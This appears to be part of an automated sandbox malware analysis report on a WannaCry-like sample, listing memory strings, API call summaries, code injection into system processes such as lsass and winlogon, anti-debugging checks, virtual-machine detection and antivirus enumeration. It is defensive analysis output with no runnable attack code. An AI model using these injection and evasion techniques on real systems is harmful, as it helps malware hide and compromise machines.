              Source: backgroundTaskHost.exe, 00000024.00000003.525688768.000001D42694B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MNVMWARE%2&OE
              Source: svchost.exe, 00000010.00000000.306971509.0000025CB586C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: "@vmicvss-block-in
              Source: lsass.exe, 00000009.00000002.798535635.00000240B2694000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
              Source: backgroundTaskHost.exe, 00000024.00000000.467119785.000001D4240CE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: post:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106554&TID=700342084&CID=128000000001392709&BID=1423522069&PG=PC000P0FR5.0000000IQ8&TPID=425106554&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=1&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=dd1a8e84fd1343a98117c17a02a03b24&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: "@Allow outbound TCP traffic for vmicheartbeat
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@vmicheartbeat
              Source: dwm.exe, 0000001B.00000002.813088603.000002C6305D0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000Y
              Source: svchost.exe, 00000010.00000000.300104611.0000025CB5036000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmicshutdown
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@Block any inbound traffic for vmicshutdown
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: "@Block any outbound traffic for vmicvss
              Source: lsass.exe, 00000009.00000002.792607879.00000240B2613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.275771857.00000240B2613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285123785.00000240B2613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.791962737.000002DDC763D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.795563189.000001F18B868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.791833204.0000022B27E29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.390460408.000002C301E2D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.791425086.000002C301E2D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.799675705.00000247D1CB5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.395952690.00000247D1CB5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.801576045.000002418A63F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: backgroundTaskHost.exe, 00000024.00000000.557062800.000001D4264FD000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.587020146.000001D4264FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@Lx&
              Source: lsass.exe, 00000009.00000002.798535635.00000240B2694000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ,@vmicvss-block-out
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: "@vmicshutdown-block-in
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: .@vmicheartbeat-allow-in-2
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ,@Allow inbound TCP port 636 traffic for vmicheartbeat
              Source: svchost.exe, 00000019.00000002.682002593.000001FF10C64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @Hyper-V RAW
              Source: svchost.exe, 00000010.00000000.300104611.0000025CB5036000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $@vmicheartbeat
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: .@vmicheartbeat
              Source: svchost.exe, 0000000E.00000002.788049235.000002DDC7602000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
              Source: lsass.exe, 00000009.00000002.798535635.00000240B2694000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
              Source: mssecsvc.exe Binary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Driver
              Source: svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Allow inbound TCP port 389 traffic for vmicheartbeatLMEMp
              Source: backgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: .@Block any other outbound traffic for vmicheartbeat
              Source: lsass.exe, 00000009.00000000.285583942.00000240B2669000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.275907393.00000240B2669000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.796622060.00000240B2669000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Adm B
              Source: svchost.exe, 00000010.00000000.300104611.0000025CB5036000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @vmicheartbeat
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ,@Block any outbound traffic for vmicshutdown
              Source: C:\Windows\mssecsvc.exe Code function: 4_2_00B93D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount, 4_2_00B93D36
              Source: C:\Windows\tasksche.exe Code function: 29_2_004029CC free,GetProcessHeap,HeapFree, 29_2_004029CC
              Source: C:\Windows\mssecsvc.exe Code function: 4_2_00B9042D rdtsc 4_2_00B9042D
              Source: C:\Windows\mssecsvc.exe Process token adjusted: Debug
              Source: C:\Windows\mssecsvc.exe Code function: 4_2_00B905F2 mov eax, dword ptr fs:[00000030h] 4_2_00B905F2
              Source: C:\Windows\mssecsvc.exe Code function: 4_2_00B9042D mov eax, dword ptr fs:[00000030h] 4_2_00B9042D
              Source: C:\Windows\mssecsvc.exe Code function: 4_2_00B9025E mov edx, dword ptr fs:[00000030h] 4_2_00B9025E
              Source: C:\Windows\mssecsvc.exe Code function: 4_2_7FEA05F2 mov eax, dword ptr fs:[00000030h] 4_2_7FEA05F2
              Source: C:\Windows\mssecsvc.exe Code function: 4_2_7FEA025E mov edx, dword ptr fs:[00000030h] 4_2_7FEA025E
              Source: C:\Windows\mssecsvc.exe Code function: 4_2_7FEA042D mov eax, dword ptr fs:[00000030h] 4_2_7FEA042D
              Source: C:\Windows\mssecsvc.exe Code function: 11_2_00A805F2 mov eax, dword ptr fs:[00000030h] 11_2_00A805F2
              Source: C:\Windows\mssecsvc.exe Code function: 11_2_00A8042D mov eax, dword ptr fs:[00000030h] 11_2_00A8042D
              Source: C:\Windows\mssecsvc.exe Code function: 11_2_00A8025E mov edx, dword ptr fs:[00000030h] 11_2_00A8025E
              Source: C:\Windows\mssecsvc.exe Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\lsass.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\dwm.exe protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and write
              Source: C:\Windows\mssecsvc.exe Section loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\backgroundTaskHost.exe protection: execute and read and write
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\reytVt target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\lsass.exe protection: execute and read and write
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write (2 identical entries)
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write (4 identical entries)
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\dwm.exe protection: execute and read and write
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000 (11 identical entries)
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D426310000 (3 identical entries)
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D423FC0000 (8 identical entries)
Source: C:\Windows\mssecsvc.exe | Memory protected: unknown base: 773E9A50 protect: page execute and read and write (17 identical entries)
Source: C:\Windows\mssecsvc.exe | Memory protected: unknown base: 773E9830 protect: page execute and read and write (17 identical entries)
Source: C:\Windows\mssecsvc.exe | Memory protected: unknown base: 773EA040 protect: page execute and read and write (17 identical entries)
Source: C:\Windows\mssecsvc.exe | Memory protected: unknown base: 773E99D0 protect: page execute and read and write (16 identical entries)
Source: C:\Windows\mssecsvc.exe | Memory protected: unknown base: 773EA120 protect: page execute and read and write (16 identical entries)
Source: C:\Windows\mssecsvc.exe | Memory protected: unknown base: 773E9670 protect: page execute and read and write (16 identical entries)
Source: C:\Windows\mssecsvc.exe | Thread created: unknown EIP: 7FFF3C38
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1
Source: dwm.exe, 0000001B.00000000.350379771.000002C633456000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000001B.00000002.837380196.000002C633456000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: winlogon.exe, 00000007.00000002.805790920.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.282392035.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.272638752.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000007.00000002.805790920.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.282392035.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.272638752.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: winlogon.exe, 00000007.00000002.805790920.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.282392035.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.272638752.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager,
Source: winlogon.exe, 00000007.00000002.805790920.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.282392035.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.272638752.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (6 identical entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 identical entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 identical entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation (2 identical entries)
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338389 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338389\a55f2be5f0b941e987b5cade10ae9cb7_1 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815\c174b4f911d842a39252a6b31960e6c8_1 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\b9de0c2b2b3648e8a125cac302df5505_1 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1658332418 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1658332418 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1658332419 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1658332423 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\963e3f45523380a2c6863a4e725418b8c00a5272db711428aa77a85033610e1c VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\cf0e347e4829f32b660aa0a3b28c38bd7cba4cc57aa78e26c6d08bdb37dbb4a7 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\632e00fad280a96729794f359a66b17a2dc39681bc37311dad989871bd234e0c VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\95d06b98be181b45e9ff457bef9e40c387a9c0bbc5b2f9c66c20cd5c2ec94d0c VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\2f08b9969a984767a36345d102e1c84e2fcfd54da755a2d98b6fe62b3330d53a VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\20a965134266d21288385fdc62819121648b69cc26f87e618a979d435d7547ac VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1658332433 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\6bce4edafa1d5562be892960e9a791e50699ffe57ea4fcf4b5b5456308a2e95f VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\842e4e4ad8e41e6a893a996baa08c061072d3b11c57f83bbc8f6b5992f9c5613 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\963e3f45523380a2c6863a4e725418b8c00a5272db711428aa77a85033610e1c VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\cf0e347e4829f32b660aa0a3b28c38bd7cba4cc57aa78e26c6d08bdb37dbb4a7 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\cbc20ba0195f823c2fea772005e771d5a040a705e7ba53a6725db96426511b39 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\098847447c33ddf8f805abd62099314078d2782a710a881d2548ac395a48ce9f VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\83a4606a9c604ec59350c94231b7a4ff_1 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388\2f9298d8ab8f4c23885c30ea9b373c83_1 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\361920c594c1482591c08f3c6c53d03d_1 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\2b5e800dda5d4fe0804933c66ff1142b_1 VolumeInformation
Source: C:\Windows\System32\backgroundTaskHost.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\098c5115fc7f4ab9959905b886004365_1 VolumeInformation
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9388E GetSystemTime,Sleep,InternetGetConnectedState,gethostbyname,socket,ioctlsocket,connect,Sleep,closesocket,4_2_00B9388E
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,4_2_00B9042D

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
              Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
              Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
              Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
              Source: svchost.exe, 00000016.00000002.792433509.000001FA92C40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: svchost.exe, 00000021.00000000.399456497.00000247D314C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.812507836.00000247D314C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000021.00000002.817216854.00000247D368E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.400929134.00000247D368E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.401142709.00000247D36C5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@\device\harddiskvolume4\program files\windows defender\msmpeng.exe
              Source: svchost.exe, 00000021.00000000.401142709.00000247D36C5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @\device\harddiskvolume4\program files\windows defender\msmpeng.exe
              Source: svchost.exe, 00000021.00000002.817216854.00000247D368E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.400929134.00000247D368E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.400308692.00000247D3613000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *@\device\harddiskvolume4\program files\windows defender\msmpeng.exe
              Source: svchost.exe, 00000021.00000002.807269952.00000247D3000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: .@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000021.00000000.399456497.00000247D314C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.812507836.00000247D314C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000016.00000002.794012016.000001FA92D02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: mssecsvc.exe, mssecsvc.exe, 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000002.384640585.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: 2\Device\HarddiskVolume2\Windows\ehome\mcupdate.exe
              Source: mssecsvc.exe | Binary or memory string: 8\Device\HarddiskVolume2\Program Files\AVG\Av\avgcmgr.exe
              Source: svchost.exe, 00000021.00000002.807269952.00000247D3000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $@C:\Program Files\Windows Defender\MsMpEng.exe
